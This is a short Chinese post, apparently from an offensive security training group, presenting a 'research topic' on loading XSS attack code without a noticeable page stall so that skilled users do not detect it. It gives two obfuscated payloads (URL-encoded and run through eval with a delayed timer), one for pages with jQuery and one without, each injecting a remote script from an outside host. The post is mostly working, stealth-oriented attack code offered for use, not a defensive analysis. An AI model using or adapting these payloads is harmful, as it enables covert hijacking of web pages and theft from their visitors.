研究课题简介:
在针对于高技术性人员或者内行人员进行页面XSS攻击时,我们可以通过发现打开页面会停滞一下从而会看出异常,而此次研究课题是针对于在打开页面无停滞情况下进行加载XSS攻击代码。
- 代码短小精悍
- 实现隐藏无停滞加载
代码提供者:学员:1694205902
有Jquery情况下:
<script defer>
eval(unescape("window.setTimeout%28function%28%29%7B%24%28%22HEAD%22%29.append%28%22%3Cscript%20src%3D%27http%3A//xms.la/1UG43XY5%27%3E%3C/script%3E%22%29%7D%2C1000%29%3B"))
</script>
无Jquery情况:
<script defer>
eval(unescape("window.setTimeout%28function%28%29%7Bvar%20oScript%3Ddocument.createElement%28%22script%22%29%3BoScript.src%3D%22http%3A//xms.la/1UG43XY5%22%3Bdocument.getElementsByTagName%28%22HEAD%22%29.item%280%29.appendChild%28oScript%29%7D%2C1000%29%3B"))
</script>
如果你还有更加优质的解决方案请留言。
